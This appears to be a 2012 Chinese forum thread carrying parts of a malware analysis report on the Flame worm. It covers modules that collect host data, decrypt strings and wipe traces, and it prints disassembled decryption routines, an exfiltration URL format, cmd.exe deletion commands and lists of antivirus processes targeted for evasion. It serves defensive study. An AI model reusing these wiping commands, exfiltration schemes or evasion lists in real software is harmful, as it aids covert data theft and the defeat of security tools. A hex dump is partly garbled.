创意安天

 找回密码
 注册创意安天
12
返回列表 发新帖

Flame蠕虫样本集分析报告

[复制链接]
 楼主| 发表于 2012-8-1 18:21 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:28 编辑

3.6  Wusetupv.exe模块分析

Wusetupv.exe火焰病毒运行后释放的病毒文件之一,我们通过对此模块的分析了解到,此模块是用来收集本机各个接口的信息,进程信息,注册表键值信息。

该样本使用MITM方法,利用了微软的数字签名漏洞。

24.jpg


图3-26Flame使用微软数字签名


25.jpg


图3-27Flame使用微软数字签名


Wusetupv.exe运行后创建互斥量"WPA_NTOS_MUTEX"
查找"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DHF593.tmp"文件,并读取文件内容。
尝试下载文件存储为"C:\WINDOWS\temp\~ZFF042.tmp"(猜测下载的就是Flame的主模块“mssecmgr.ocx”

26.jpg


图3-28下载文件


27.jpg


图3-29存储为"C:\WINDOWS\temp\~ZFF042.tmp"


从操作系统的MIB库中读出本机各个接口的当前信息,如接口数目、类型、速率、物理地址、接收/发送字节数、错语字节数等。

28.jpg


图3-30收集本机各个接口信息


收集本机进程信息,加密后作为参数回传。

29.jpg


图3-31收集进程信息并加密


创建指定格式的URL回传主机信息:
http://MSHOME-<STRING>/view.php?mp=1&jz=<STRING>&fd=<STRING>&am=<STRING>&ef=<STRING>&pr=<STRING>&ec=<STRING>&ov=<STRING>&pl=<STRING>
Jz参数是随机创建的,主要功能代码如下:

30.jpg


图3-32创建Jz参数的函数代码


am参数是MAC地址,与0x55异或加密(如下图)。

31.jpg


图3-33MAC地址的加密函数


ef参数是IP地址,与0x44异或加密(如下图)。

32.jpg


图3-34IP地址的加密函数


ov参数是加密后的系统版本号。
Pl参数是加密后的进程列表。
加密方式采用简单的替换,列表如下[6]
hXk1Qrbf6VH~29SMYAsCF-q7Omad0eGLojWi.DyvK8zcnZxRTUpwE_B5tuNPIJgl43ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-.
查询系统注册表
HKEY_CURRENT_USER\ConsoleStandardSize
SYSTEM\CurrentControlSet\Control\TimeZoneInformationStandardDateBias
查看系统注册表中是否有KasperskyLab项判断多个版本:
"HKLM\SOFTWARE\KasperskyLab\AVP6"
"HKLM\SOFTWARE\KasperskyLab\protected\AVP7"
"HKLM\SOFTWARE\KasperskyLab\protected\AVP8"
 楼主| 发表于 2012-8-1 18:26 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:29 编辑

3.7  Boot32drv.sys解密分析

Boot32drv.sys是一个加密数据文件并不是PE文件,加密方式是通过与0xFFxor操作。

加密文件如下:

33.jpg


图3-35加密的“Boot32drv.sys”的文件内容



解密代码如下:
      pop   esi            ; To decrypt data address
      mov   edi,esi        ; To decrypt data address
      pop   ecx            ; To decrypt the length of the data
_lib:
      cmp   ecx,0
      jz  _end
      lodsb
      xor  al,255
      dec   ecx
      stosb
      jmp   _lib
_end:

解密后的数据如下:
001529A8  00 0A 00 00 00 01 01DC 03 00 00 01 90 01 00 1B  .....?..?.001529B8  31 B3 C1 FF FF FF FFFF FF FF 02 04 00 00 00 B9  1??     001529C8  04 00 00 1E 9B C6 2B06 04 00 00 00 40 77 1B 00  w.001529D8  AC 8E C5 72 03 48 0000 00 27 00 00 00 00 00 00  瑤舝H...'......001529E8  00 FF FE 52 00 45 0041 00 52 00 5F 00 57 00 49  .寸昀漀渀琀=宋体]寨/font].E.A.R._.W.I001529F8  00 4E 00 44 00 4F 0057 00 2E 00 44 00 45 00 53 .N.D.O.W...D.E.S00152A08  00 4B 00 54 00 4F 0050 00 5F 00 53 00 41 00 4D .K.T.O.P._.S.A.M00152A18  00 50 00 4C 00 45 005F 00 52 00 41 00 54 00 45 .P.L.E._.R.A.T.E00152A28  00 F1 62 CA E6 FF FFFF FF FF FF FF FF FF FF 06  .馼舒00152A38  04 00 00 00 C0 D4 0100 75 21 8F F4 03 46 00 00  .u!F..00152A48  00 8F 00 00 00 34 0000 00 FF FE 52 00 45 00 41  .?..4...寸昀漀渀琀=宋体]寨/font].E.A00152A58  00 52 00 5F 00 57 0049 00 4E 00 44 00 4F 00 57  .R._.W.I.N.D.O.W00152A68  00 2E 00 57 00 49 004E 00 44 00 4F 00 57 00 5F ...W.I.N.D.O.W._00152A78  00 53 00 41 00 4D 0050 00 4C 00 45 00 5F 00 52 .S.A.M.P.L.E._.R00152A88  00 41 00 54 00 45 00FF EC 98 63 FF FF FF FF FF  .A.T.E.寸昀漀渀琀=宋体]鞓c00152A98  FF FF FF FF FF FF FF06 04 00 00 00 00 00 00 00  ???????????????00152AA8  DE 63 59 11 03 66 0000 00 F7 00 00 00 9C 00 00  Yf...?..?.00152AB8  00 FF FE 52 00 45 0041 00 52 00 5F 00 57 00 49  .寸昀漀渀琀=宋体]寨/font].E.A.R._.W.I00152AC8  00 4E 00 44 00 4F 0057 00 2E 00 4E 00 4F 00 54 .N.D.O.W...N.O.T00152AD8  00 5F 00 49 00 4E 0054 00 45 00 52 00 45 00 53 ._.I.N.T.E.R.E.S00152AE8  00 54 00 49 00 4E 0047 00 5F 00 50 00 52 00 4F .T.I.N.G._.P.R.O00152AF8  00 43 00 45 00 53 0053 00 45 00 53 00 5F 00 49 .C.E.S.S.E.S._.I00152B08  00 4E 00 54 00 45 0052 00 56 00 41 00 4C 00 44 .N.T.E.R.V.A.L.D00152B18  E5 9E 9F FF FF FF FFFF FF 06 04 00 00 00 00 00  ????????????00152B28  00 00 DE 63 59 11 0356 00 00 00 79 01 00 00 04  ..YV...y??????00152B38  01 00 00 FF FE 52 0045 00 41 00 52 00 5F 00 57  ..寸昀漀渀琀=宋体]寨/font].E.A.R._.W00152B48  00 49 00 4E 00 44 004F 00 57 00 2E 00 49 00 4E .I.N.D.O.W...I.N00152B58  00 54 00 45 00 52 0045 00 53 00 54 00 49 00 4E .T.E.R.E.S.T.I.N00152B68  00 47 00 5F 00 50 0052 00 4F 00 43 00 45 00 53  .G._.P.R.O.C.E.S00152B78  00 53 00 45 00 53 002E 00 73 00 69 00 7A 00 65 .S.E.S...s.i.z.e?00152B88  00 F4 2A D4 62 FF FFFF FF FF FF FF FF FF 06 04  .????????00152B98  00 00 00 00 00 00 00DE 63 59 11 03 58 00 00 00  .......YX...00152BA8  EE 01 00 00 86 01 0000 FF FE 52 00 45 00 41 00  ?..?..寸昀漀渀琀=宋体]寨/font].E.A.00152BB8  52 00 5F 00 57 00 4900 4E 00 44 00 4F 00 57 00 R._.W.I.N.D.O.W.00152BC8  2E 00 49 00 4E 00 5400 45 00 52 00 45 00 53 00 ..I.N.T.E.R.E.S.00152BD8  54 00 49 00 4E 00 4700 5F 00 50 00 52 00 4F 00 T.I.N.G._.P.R.O.00152BE8  43 00 45 00 53 00 5300 45 00 53 00 2E 00 66 00 C.E.S.S.E.S...f.00152BF8  69 00 72 00 73 00 7400 98 6B 24 F8 FF FF FF FF  i.r.s.t.$?00152C08  FF FF FF 06 04 00 0000 00 00 00 00 DE 63 59 11  Y00152C18  03 56 00 00 00 63 0200 00 FB 01 00 00 FF FE 52  V...c..?..寸昀漀渀琀=宋体]寨/font]00152C28  00 45 00 41 00 52 005F 00 57 00 49 00 4E 00 44 .E.A.R._.W.I.N.D00152C38  00 4F 00 57 00 2E 0049 00 4E 00 54 00 45 00 52 .O.W...I.N.T.E.R00152C48  00 45 00 53 00 54 0049 00 4E 00 47 00 5F 00 50 .E.S.T.I.N.G._.P00152C58  00 52 00 4F 00 43 0045 00 53 00 53 00 45 00 53 .R.O.C.E.S.S.E.S00152C68  00 2E 00 6C 00 61 0073 00 74 00 C5 77 91 31 FF  ...l.a.s.t.?00152C78  FF FF FF FF FF FF FFFF 06 04 00 00 00 01 00 00  ………………00152C88  00 BB 04 E5 A9 03 5600 00 00 D8 02 00 00 70 02  .?V...?..p00152C98  00 00 FF FE 52 00 4500 41 00 52 00 5F 00 57 00  ..寸昀漀渀琀=宋体]寨/font].E.A.R._.W.00152CA8  49 00 4E 00 44 00 4F00 57 00 2E 00 49 00 4E 00 I.N.D.O.W...I.N.00152CB8  54 00 45 00 52 00 4500 53 00 54 00 49 00 4E 00 T.E.R.E.S.T.I.N.00152CC8  47 00 5F 00 50 00 5200 4F 00 43 00 45 00 53 00 G._.P.R.O.C.E.S.00152CD8  53 00 45 00 53 00 2E00 66 00 72 00 65 00 65 00 S.E.S...f.r.e.e.00152CE8  39 8A 88 A6 FF FF FFFF FF FF FF FF FF 06 04 00  9 ?.??.....00152CF8  00 00 00 00 00 00 DE63 59 11 03 50 00 00 00 4D  ......Y???P...M00152D08  03 00 00 E5 02 00 00FF FE 52 00 45 00 41 00 52  ..?..寸昀漀渀琀=宋体]寨/font].E.A.R00152D18  00 5F 00 57 00 49 004E 00 44 00 4F 00 57 00 2E ._.W.I.N.D.O.W..00152D28  00 49 00 4E 00 54 0045 00 52 00 45 00 53 00 54 .I.N.T.E.R.E.S.T00152D38  00 49 00 4E 00 47 005F 00 54 00 49 00 54 00 4C .I.N.G._.T.I.T.L00152D48  00 45 00 53 00 2E 0073 00 69 00 7A 00 65 00 BE .E.S...s.i.z.e.00152D58  97 A6 8A FF FF 06 0400 00 00 00 00 00 00 DE 63  ?.......00152D68  59 11 06 04 00 00 0000 00 00 00 DE 63 59 11 06  Y.......Y00152D78  04 00 00 00 01 00 0000 BB 04 E5 A9 0C 1E 00 00  ......?...00152D88  00 00 00 00 00 A3 C40C 69 FF FF FF FF FF FF FF  ......i00152D98  FF FF FF FF FF FF FFFF FF FF FF FF FF FF FF FF  00152DA8  FF FF FF 03 52 00 0000 B5 03 00 00 5A 03 00 00  勸...?..Z..00152DB8  FF FE 52 00 45 00 4100 52 00 5F 00 57 00 49 00  寸昀漀渀琀=宋体]寨/font].E.A.R._.W.I.00152DC8  4E 00 44 00 4F 00 5700 2E 00 49 00 4E 00 54 00 N.D.O.W...I.N.T.00152DD8  45 00 52 00 45 00 5300 54 00 49 00 4E 00 47 00 E.R.E.S.T.I.N.G.00152DE8  5F 00 54 00 49 00 5400 4C 00 45 00 53 00 2E 00 _.T.I.T.L.E.S...00152DF8  66 00 69 00 72 00 7300 74 00 B1 7F F6 66 03 50  f.i.r.s.t.?P00152E08  00 00 00 C2 03 00 0003 04 00 00 FF FE 52 00 45  ...?....寸昀漀渀琀=宋体]寨/font].E00152E18  00 41 00 52 00 5F 0057 00 49 00 4E 00 44 00 4F .A.R._.W.I.N.D.O00152E28  00 57 00 2E 00 49 004E 00 54 00 45 00 52 00 45 .W...I.N.T.E.R.E00152E38  00 53 00 54 00 49 004E 00 47 00 5F 00 54 00 49  .S.T.I.N.G._.T.I00152E48  00 54 00 4C 00 45 0053 00 2E 00 6C 00 61 00 73 .T.L.E.S...l.a.s00152E58  00 74 00 8C 30 08 74FF FF 03 50 00 00 00 CF 03  .t.?t僸...?00152E68  0000 5E 04 00 00 FFFE 52 00 45 00 41 00 52 00  ..^..寸昀漀渀琀=宋体]寨/font].E.A.R.00152E78  5F 00 57 00 49 00 4E00 44 00 4F 00 57 00 2E 00 _.W.I.N.D.O.W...00152E88  49 00 4E 00 54 00 4500 52 00 45 00 53 00 54 00 I.N.T.E.R.E.S.T.00152E98  49 00 4E 00 47 00 5F00 54 00 49 00 54 00 4C 00 I.N.G._.T.I.T.L.00152EA8  45 00 53 00 2E 00 6600 72 00 65 00 65 00 62 62 E.S...f.r.e.e.bb00152EB8  91 78 FF FF                                      寸昀漀渀琀=宋体]

整理后得到的明文字符串列表如下:
EAR_WINDOWDESKTOP_SAMPLE_RATE
EAR_WINDOWWINDOW_SAMPLE_RATE
EAR_WINDOWNOT_INTERESTING_PRCESSES_INTERVALD
EAR_WINDOWINTERESTING_PROCESSESsize
EAR_WINDOWINTERESTING_PROCESSESfirst
EAR_WINDOWINTERESTING_PROCESSESlast
EAR_WINDOWINTERESTING_PROCESSESfree
EAR_WINDOWINTERESTING_TITLESsize
EAR_WINDOWINTERESTING_TITLESfirst
EAR_WINDOWINTERESTING_TITLESlast
EAR_WINDOWINTERESTING_TITLESfree
 楼主| 发表于 2012-8-1 18:43 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:30 编辑

3.8 Browse32.ocx模块分析

Browse32.ocx火焰病毒运行后从远程服务器下载的模块,我们通过对此模块的分析了解到,些模块是用来删除恶意软件所有痕迹,防止取证分析。Browse32.ocx运行后会把恶意软件创建的所有文件写入垃圾字符覆盖,然后再删除这些文件,以防止任何人获得感染有关的信息的磁盘。

1.获取系统版本信息,遍历系统进程信息。

2.清理文件痕迹操作:

获取文件属性,文件列表参见附录五(详见附录五:Browse32.ocx模块遍历计算机系统中是否有如下文件列表),然后设置文件属性为normal,获取文件大小,如果不为空,则根据文件大小,写入同样字节数的垃圾数据覆盖,然后再写入00数据覆盖(防止文件恢复)。

3.创建进程执行命令:

"C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSSecurityMgr"

"C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSAudio""

"C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSAuthCtrl""

"C:\WINDOWS\system32\cmd.exe" /crd /s /q "C:\Program Files\Common Files\MicrosoftShared\MSSndMix""

"C:\WINDOWS\system32\cmd.exe"/cdel/q /f

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~*"                                                            

"C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\ssi*"

"C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\aud*"

"C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\tok*"

"C:\WINDOWS\system32\cmd.exe" /cdel /q /f C:\WINDOWS\system32\lrl*"

4.清理注册表操作:

动态调用注册表相关函数

函数查看并删除注册表键值

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa

AuthenticationPackages”mssecmgr.ocx”

重复设置随机键值(A开头字母数字结合9位),并删除。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation

StandardSize:

文件中发现大量对如下算法的调用。

算法的运算方法如下:

M=(0xbh+N)*(N+0xbh+0xch)

注:N是要解密的字符距起始字符的距离。

AL=(M1)^(M2)^(M3)^(M4)

Decrypteddata = Encrypted data – AL

解密时,用密文减去该密钥,即可得到明文。

34.jpg


3-36AL=(M1)^(M2)^(M3)^(M4)




解密数据代码:
该函数没有明参数,数据的传递是通过寄存器edx和eax传递的两个隐参数。
0x1000C826  proc   near
          test   edx, edx
          push   esi
          mov    esi, eax
          jbe    short 0x1000C860
          push   ebx
          push   edi
          push   0Bh
          pop    edi
          sub    edi,  esi

0x1000C834:
     lea   
ecx,   [edi+esi]
          lea    eax,   [ecx+0Ch]
          imul   eax, ecx       ; (0xbh+N)*(N+0xbh+0xch)
          add    eax, dword_10067168
          mov    ecx,eax
          shr    ecx,18h
          mov    ebx,eax
          shr    ebx,10h
          xor    cl,bl
          mov    ebx,eax
          shr    ebx,8
          xor    cl,bl
          xor    cl,al
          sub    [esi],cl
          inc    esi
          dec    edx
          jnz    short  0x1000C834  
     pop    edi     pop    ebx
0x1000C860:
  
     pop   esi   
     retn
0x1000C826  endp
对该函数的调用有2个。
调用1代码如下:

0x1000C8A8 proc     near

                 push     ebp         

                     mov      ebp,esp

                     push     ebx

                     push    esi

                     push    edi

                     mov    eax, eax

                     push   ebx

                     push   eax

                     pop     eax

                     pop     ebx

                    push

                    popa         

                    mov    esi,   [ebp+8]

                    cmp    word   ptr   [esi+10h],0

                    jnz      short   0x1000C8C9

                    mov   al,  al

                    mov   ah,  ah

                    lea     eax,   [esi+14h]
                           jmp   short   0x1000C8E9

0x1000C8C9:

                    movzx       edx, word     ptr   [esi+12h]

                    lea      ebx,  [esi+14h]

                    mov    eax,  ebx         

                    call     0x1000C826

                   and     word  ptr  [esi+10h],   0      

                   cmp    eax,0        

                   jz        short   0x1000C8E        

                   nop

                   mov   edi,edi         

                   nop
    0x1000C8E5:     

                   mov        esi,esi         

                   mov       eax,ebx
    0x1000C8E9:

                  pop     edi

                  pop     esi         

                  pop     ebx

                  pop     ebp         

                  retn

0x1000C8A8  endp

1000C8A8  函数被调用340次。
函数需要一个参数:
各个调用代码并无明显差异,随机取一处得到代码情况如下:
0x100010C6                 push    0x10064C48
0x100010CB                 call    0x1000C8A8
从函数1000C8A8中可以发现压入的数据结构如下:

DWORD*4:unknow



WORD:sign



WORD:length:N



WORD*N:Encrypted  data



??:unknow



调用2代码如下:

0x1000C862    proc     near

                         push     ebp

                         mov      ebp,  esp

                         push     ebx

                         push     esi

                         push     edi

                         mov      eax,eax

                         push     ebx

                         push     eax

                         pop       eax

                         pop       ebx

                         pusha

                         popa

                         move    bx,[ebp+8]

                         cmp       byteptr[ebx+8],0

                         jnz         short   0x1000C882

                         mov       al, al

                         mov       ah, ah

                         lea         eax, [ebx+0Bh]

                         jmp       short  0x1000C8A3

0x1000C882:

                         movzx   edx, word  ptr  [ebx+9]

                         lea         eax,   [ebx+0Bh]

                         mov       [ebp+8],  eax

                         call         0x1000C826

                         cmp       eax,  0

                         jz            short 0x1000C89A

                         nop

                         mov       edi,edi

                         nop

0x1000C89A:

                         mov       esi,esi

                         mov       eax, [ebp+8]

                         mov       byte  ptr  [ebx+8],   0

0x1000C8A3:

                         pop         edi

                         pop        esi

                         pop        ebx

                         pop        ebp

                         retn

0x1000C862    endp

函数1000C862被调用两次:
该函数需要一个参数:
各个调用代码并无明显差异,随机取一处得到代码如下:
0x1004046F                 push    0x1005C268
0x10040474                 call     0x1000C862
从函数1000C862中可以发现压入的数据结构如下:
  

DWORD*2:unknow

  
  

BYTE:sign

  
  

WORD:length:N

  
  

WORD*N:Encrypted data

  
  

??:unknow

  
 楼主| 发表于 2012-8-1 19:01 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:11 编辑

3.9 Jimmy.dll模块分析

Jimmy.dll是“火焰”病毒运行后从146资源文件中释放出来的,我们通过对此模块的分析了解到,此模块的作用为收集用户计算机信息,包括窗体标题、注册表相关键值信息,计算机名,磁盘类型等。

1.判断当前是否在调试模式,如果是则结束当前进程。

2.查找资源0xA3(163)0xA4(164)并加载。

3.遍历C盘目录下文件,并判断文件类型,获取文件大小。

4.查找文件"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~c34.tmp"
并读取内容并做相应处理,而后删除此文件。

5.获取当前计算机名称。

6.查找文件%Temp%\~dra52.tmp%WINDOWS%\temp\~a29.tmp

7.获取注册键值信息


  • HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformationStandardSize
  • HKEY_CLASSES_ROOT\CLSID\{98de59a0-d175-11cd-a7bd-00006b827d94}
  • HKLM\SOFTWARE\KasperskyLab\AVP6
  • HKLM\SOFTWARE\KasperskyLab\protected\AVP7

8.遍历以下进程:


  • FCH32.EXE
  • PXConsole.exe
  • PXAgent.exe
  • Filemon.exe
  • fsav32.exe
  • FPAVServer.exe
  • fssm32.exe
  • FProtTray.exe
  • fspc.exe
  • fsdfwd.exe
  • fsguidll.exe
  • FAMEH32.EXE
  • fsqh.exe
  • FSMB32.EXE
  • FSMA32.EXE
  • fsgk32.exe
  • FSM32.EXE
  • fsgk32st.exe
  • jpfsrv.exe
  • procexp.exe
  • jpf.exe
  • SpywareTerminator.Exe
  • sp_rsser.exe
  • SpywareTerminatorShield.Exe
  • AntiHook.exe
  • procexp.exe
  • avp.exe

文件中发现大量对如下算法的调用。

算法的运算方法如下:

M=(0xbh+N)*(N+0xbh+0x6h)+0x58h

注:N是要解密的字符距起始字符的距离。

解密时,用密文减去该密钥,即可得到明文。

AL=(M1)^(M2)^(M3)^(M4)


Decrypteddata = Encrypted data – AL

35.jpg


图3-37AL=(M1)^(M2)^(M3)^(M4)


解密数据代码:
0x1000D9DC      proc      near
                            test       edx,   edx
                            push      esi
                            mov       esi,   eax
                            jbe         short   0x1000DA13
                            push      ebx
                            push      edi
                            push      0Bh
                            pop        edi
                           sub         edi,   esi
0x1000D9EA:
                           lea          ecx,   [edi+esi]
                           lea          eax,   [ecx+6]
                           imul        eax,  ecx
                           add         eax,  58h
                           mov        ecx,  eax
                           shr          ecx, 18h
                           mov        ebx, eax
                           shr          ebx, 10h
                           xor          cl, bl
                           mov        ebx,  eax
                          shr           ebx,   8
                          xor           cl, bl
                          xor          cl,al
                          sub          [esi],cl
                          inc           esi
                         dec           edx
                         jnz            short  0x1000D9EA
                         pop           edi
                         pop           ebx
0x1000DA13:
                         pop           esi
                         retn
0x1000D9DC endp

0x1000D9DC函数被调用两次,调用位置如下:
第一处调用:
0x10016610  proc  near
                      cmp   word   ptr    [esi+10h],  0
                      jnz      short   0x1001661B
                      lea      eax,   [esi+14h]
                      retn
0x1001661B:
                      movzx     edx,    word  ptr   [esi+12h]
                      push        edi
                      leaedi      [esi+14h]
                      mov         eax,edi
                      call           0x1000D9DC
                      and           word   ptr   [esi+10h],0
                      mov          eax,  edi
                      pop           edi
                      retn
0x10016610  endp

0x10016610函数被调用113次:
函数需要参数如下:
  DWORD*4: unknow    WORD:sign    WORD:length: N    WORD*N:Encrypted data    ??:unknow  

第二处调用:
0x1001A0EF proc  near
                     movzx    edx, word  ptr  [esi+9]
                     push        edi
                     lea           edi,  [esi+0Bh]
                     mov         eax,edi
                     call           0x1000D9DC
                     mov         eax,edi
                     mov         byte   ptr  [esi+8],  0
                     pop          edi
                    retn
0x1001A0EF endp

0x1001A0EF函数被调用4次:
函数需要参数如下:
  DWORD*2:unknow    BYTE:sign    WORD:length:N    WORD*N: Encrypted data    ??:unknow  
注:%System32%是一个可变路径.病毒通过查询操作系统来决定当前System文件夹的位置.

%Windir%                  WINDODWS所在目录
%DriveLetter%               逻辑驱动器根目录
%ProgramFiles%              系统程序默认安装目录
%HomeDrive%                 当前启动的系统的所在分区
%Documents and Settings%    当前用户文档根目录
%Temp%                    \Documents and Settings\当前用户\Local Setti ngs\Temp
%System32%               系统的 System32文件夹
 楼主| 发表于 2012-8-2 09:27 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 09:29 编辑

第4章 总结与展望


从近几年来包括StuxnetDuquFlame在内的恶意代码攻击事件中,我们可以清晰地看到,攻击者已经不再仅仅通过恶意代码的快速大范围传播获得技术成就感或者获得经济利益。当前的新趋势非常明显:恶意代码正成为APT攻击中最重要的一个因素。

这些被用于APT攻击的恶意代码具有这些特点:

1. 目的极其明确。攻击者不再追求恶意代码感染主机数,转而追求如何精准地命中特定目标,并有意识地避免其在非目标主机上存活,以延迟被发现的时间。

2. 隐蔽性强,存活能力高。这些恶意代码会采用多种内核技术隐藏自身,采用有效的C&C通信方式来保证长期接受指令,采用数字证书避免被检测等。因此,Flame做到了攻击两年后才被发现。

3. 代码复杂。此前的恶意代码家族,多为单一功能、类似实现,其变种大量采用自动生成的方式,其开发作为地下产业链的最上游环节,追求高效率实现。而此类恶意代码则通常由专门团队开发,不再追求批量生产,加之功能复杂多变,往往结构及其复杂。这给对其是否恶意的判定带来了不少困难。

4. 大量利用零日漏洞。包括用于外网渗透、内网传播、最终攻击,这些恶意代码往往大量地利用各类零日漏洞,因此常规的系统安全保障方法受到挑战。

5. 多平台性。这些恶意代码的运行环境既有MS-OfficeAdobe Flash Player等文档软件,又有WinCC等工控系统环境,还包括MacOS系统、Java平台等非主流环境。当攻击者不再以广泛传播为目的,恶意代码可能运行的环境就具有了无限的可能。

6. 攻击过程有序。从搜集资料,开发特定攻击代码,挖掘或购买漏洞,到渗透攻击,内网传播,远程控制等。攻击者有这样的耐心去一步步完成,实现一种让人叹为观止的攻击。

在这些特点下,无论是传统的反病毒体系(包括反病毒厂商的后台流水处理体系和部署到用户的软硬件结合检测处置体系),还是传统的安全模型与安全实践,均将遭受严峻地挑战。比如,由于攻击的针对性,传统的恶意代码样本捕获体系难以奏效,实施上,这些被用于APT的恶意代码,最后往往是由用户上报至反病毒厂商;还是由于攻击的针对性,样本自动化分析和判定系统也面临失效的可能,无论是环境模拟还是行为触发,都难以实现完全的自动化;对多种环境的零日漏洞分析、漏洞修复也需要各方的积极配合。
此外,在此类恶意代码出现之前,反病毒厂商将各类资源集中在如何保护更多用户不被恶意代码攻击上,即专注于一般性恶意代码。这些资源既包括软硬件设施和后台系统,又包括对恶意代码的分析能力积累和技术知识储备。而当此类具有APT特点的恶意代码出现时,反病毒厂商难以再像以往那样做出快速的反应。例如,Kaspersky实验室对StuxnetDuqu的分析,就前后进行了几个月的时间。在这个问题上,攻击者可以从容不迫地花数年的时间熟悉和了解特定领域的知识,并展开攻击;而对反病毒厂商来说,与攻击者的差距在将来也许依然存在。即便从非技术的角度,在此类攻击中,安全厂商与用户也处于不利的地位。我们无从知道下一个目标会是谁,也不知道攻击目的是什么。事实上,面对这种由专门的、专业的团队,花费了多年时间和大笔金钱而展开的单点攻击,这种情况已经使我们陷入泥潭。在这种困境下,我们需要做的绝不仅仅是被动地发现、分析、检测并防御这些攻击。整个产业界有必要主动出击,展开基础研究、演练攻防实况、建立新的模型和方法、细粒度了解用户、形成新的有实效性的解决方案等等。而有效的防御体系,同样需要包括系统供应商、软件开发商、硬件制造商的支持与配合,需要所有信息系统使用者共同提高安全意识并付诸实践。攻击者永远会去挑战薄弱的环节,面对这些未知的、看起来强大的威胁,唯有主动、协作,能让我们更有信心。

 楼主| 发表于 2012-8-2 09:32 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 10:17 编辑

第5章 附录


附录一
表5-1为Mssecmgr.ocx文件中的遍历安全进程列表,其列表和别它模块中的一些遍历进程列表中一些进程是相同的。
   

进程名称

   
   

说明

   
  

TSAnSrf.exe

  
  

Omniquad Anonymous  Surfing安全套件相关进程。

  
  

xauth_service.exe

  
  

不详

  
  

fwsrv.exe

  
  

Jetico Personal Firewall  进程一款全面而又简单易用的个人网络防火墙

  
  

kavmm.exe

  
  

Kaspersky Anti-Virus  Personal Pro 5 进程

  
  

acs.exe

  
  

outpost防火墙的正常进程

  
  

frzstate2k.exe

  
  

冰点还原软件的进程

  
  

Fsguiexe.exe

  
  

F-Secure反病毒软件相关程序。

  
  

Nvoy.exe

  
  

Norman AntiVirus杀毒软件相关进程

  
  

SCANWSCS.exe

  
  

Quick Heal Technologies公司QuickHeal反病毒软

  
  

zerospyware lite_installer.exe

  
  

ZeroSpyware相关组件进程
一款个人隐私防护软件

  
  

ICMON.exe

  
  

Sophos AntiVirus防毒检测的活动监视器进程

  
  

fsdfwd.exe

  
  

F-Secure Anti-Virus相关组件进程

  
  

fsrt.exe

  
  

Fortres Security进程

  
  

Fsm32.exe

  
  

F-Secure反病毒软件的一部分。

  
  

bdmcon.exe

  
  

SoftWin公司出品的BitDefender反病毒产品的一部分。

  
  

sab_wab.exe

  
  

SUPERAntiSpyware相关组件进程

  
  

TScutyNT.exe

  
  

Omniquad Ltd公司产品有关进程

  
  

blackd.exe

  
  

BlackICE计算机防火墙的一部分。

  
  

VSDesktop.exe

  
  

Virtual Sandbox 2.0  Build 209子进程

  
  

DCSUserProt.exe

  
  

DiamondCS ProcessGuard进程一款系统安全程序

  
  

authfw.exe

  
  

Authentium Firewall进程

  
  

app_firewall.exe

  
  

NetScaler App Firewall进程

  
  

lpfw.exe

  
  

Lavasoft Personal  Firewall进程

  
  

FCH32.exe

  
  

F-Secure Anti-Virus进程

  
  

ccEvtMgr.exe

  
  

Norton Internet Security网络安全套装的一部分

  
  

xfilter.exe

  
  

费尔防火墙的相关进程

  
  

Fsbwsys.exe

  
  

F-secure反病毒软件的相关程序

  
  

jpf.exe

  
  

JeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰

  
  

TSAtiSy.exe

  
  

Omniquad AntiSpy软件进程

  
  

Fsgk32.exe

  
  

F-Secure反病毒软件相关程序

  
  

fxsrv.exe

  
  

不详

  
  

swupdate.exe

  
  

Sophos AntiVirus进程

  
  

almon.exe

  
  

Sophos AutoUpdate产品的一个进程

  
  

EMLPROXY.exe

  
  

Quick Heal AntiVirus进程一款印度的著名安全软件

  
  

UmxTray.exe

  
  

TinyFirewall相关进程。TinySoftware出品的一款网络防火墙软件

  
  

NetMon.exe

  
  

NetworkMonitor一款用于管理和监测网络状况的软件进程

  
  

Firewall 2004.exe

  
  

WyvernWorks Firewall  2004软件进程。

  
  

pgaccount.exe

  
  

是关于个人帐户的进程项,当注销后用另一个帐户登录计算机,有可能会出现两个该进程项。

  
  

EMLPROUI.exe

  
  

Quick Heal AntiVirus进程

  
  

xcommsvr.exe

  
  

BitDefender反病毒产品相关程序

  
  

TMBMSRV.exe

  
  

TMBMSRV.exe是趋势Trend Micro出品的PC-cillin反病毒软件的一部分。

  
  

umxcfg.exe

  
  

TinyFirewall相关进程。TinySoftware出品的一款网络防火墙软件

  
  

Kpf4gui.exe

  
  

Kerio个人防火墙相关进程。

  
  

SpyHunter3.exe

  
  

SpyHunter反间谍软件进程

  
  

NVCSCHED.exe

  
  

NVCSched.exeNorman病毒控制台计划任务程序

  
  

alsvc.exe

  
  

Sophos AntiVirus安全产品中的一个进程

  
  

avguard.exe

  
  

AntiVir个人版网络安全套装的一部分

  
  

Fssm32.exe

  
  

F-Secure反病毒软件相关程序,用于扫描病毒

  
  

DFServEx.exe

  
  

Deep Freeze5(冰点还原)的进程

  
  

live help.exe

  
  

Windows32的应用程序相关进程

  
  

DF5ServerService.exe

  
  

Deep Freeze5(冰点还原)的进程

  
  

bdss.exe

  
  

BitDefender反病毒软件的一部分。

  
  

sched.exe

  
  

NVCSched.exeNorman病毒控制台计划任务程序

